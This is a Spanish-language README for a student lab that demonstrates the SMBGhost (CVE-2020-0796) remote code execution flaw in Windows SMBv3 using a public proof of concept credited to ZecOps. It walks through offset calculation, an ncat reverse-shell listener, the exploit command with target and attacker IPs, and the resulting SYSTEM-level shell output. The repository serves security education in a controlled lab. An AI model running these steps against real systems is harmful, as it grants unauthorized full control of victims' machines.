Prueba de concepto educativa para CVE-2020-0796 (SMBGhost) que demuestra RCE previa a la autenticación en Windows SMBv3. Incluye configuración del laboratorio paso a paso, cálculo de offsets y ejecución de shell inversa para entrenamiento controlado en ciberseguridad.
Este proyecto demuestra una prueba de concepto (PoC) del exploit CVE-2020-0796, también conocido como SMBGhost, una vulnerabilidad crítica de ejecución remota de código sin autenticación que afecta a sistemas Windows 10 y Windows Server que utilizan SMBv3. Fue desarrollado como parte de un proyecto escolar de ciberseguridad. Todo el crédito del código del exploit corresponde a ZecOps. Yo solo lo he utilizado y adaptado con fines educativos para demostrar la explotación de CVE-2020-0796 en un entorno de laboratorio controlado.
Para replicar esta demostración, se requiere la siguiente configuración:
SMBleedingGhost.py de ZecOpscalc_target_offsets.bat de ZecOpsAbra el Símbolo del sistema tanto en la máquina virtual Atacante como en la Objetivo.
Ejecute el siguiente comando en cada máquina:
ipconfig
CVE-2020-0796-RCE-POC-master.calc_target_offsets.batCVE-2020-0796-RCE-POC-master.SMBleedingGhost.py y ábralo con el Bloc de notas.SMBleedingGhost.py, desplácese hacia abajo y localice la sección que comienza con OFFSETS = {.Abra un nuevo Símbolo del sistema y ejecute:
ncat -lvp 4321
4321 para recibir una reverse shell de la Máquina Objetivo tras una explotación exitosa.cd Desktop
cd CVE-2020-0796-RCE-POC-master
dir
python SMBleedingGhost.py <ip_objetivo> <ip_atacante> <puerto>
Ejemplo usado en esta demo:
python SMBleedingGhost.py 192.168.18.61 192.168.18.62 4321
192.168.18.61: IP de la Máquina Objetivo192.168.18.62: IP de la Máquina Atacante4321: Puerto usado en el oyente de netcatSi tiene éxito, la ventana de netcat mostrará:
Microsoft Windows [Versión 10.0.18362.356]
(c) 2019 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32>
Esto confirma que:
Puede validar el acceso ejecutando:
whoami
Esto devolverá:
whoami
nt authority\system
Esto significa que la Máquina Atacante ahora tiene privilegios de nivel de sistema en la Máquina Objetivo.
También puede ejecutar:
ipconfig
Para verificar que está interactuando con la red de la Máquina Objetivo.

Nota: La Máquina Objetivo puede fallar después de la explotación. Si ocurre, puede reiniciarla. La sesión del atacante deberá restablecerse después del reinicio.
Esta demostración se basa en la prueba de concepto disponible públicamente desarrollada por ZecOps.
Todo el crédito del código del exploit corresponde a ZecOps. Yo solo lo he utilizado y adaptado con fines educativos para demostrar la explotación de CVE-2020-0796 en un entorno de laboratorio controlado.
Este repositorio se crea únicamente con fines educativos.
Todas las herramientas, scripts y técnicas demostradas están destinadas a ayudar a comprender las vulnerabilidades de ciberseguridad en un entorno de laboratorio controlado. No intente utilizar ninguno de los materiales proporcionados en sistemas o redes que no posea o para los cuales no tenga permiso explícito para realizar pruebas.
Cualquier uso indebido del software no será responsabilidad del autor.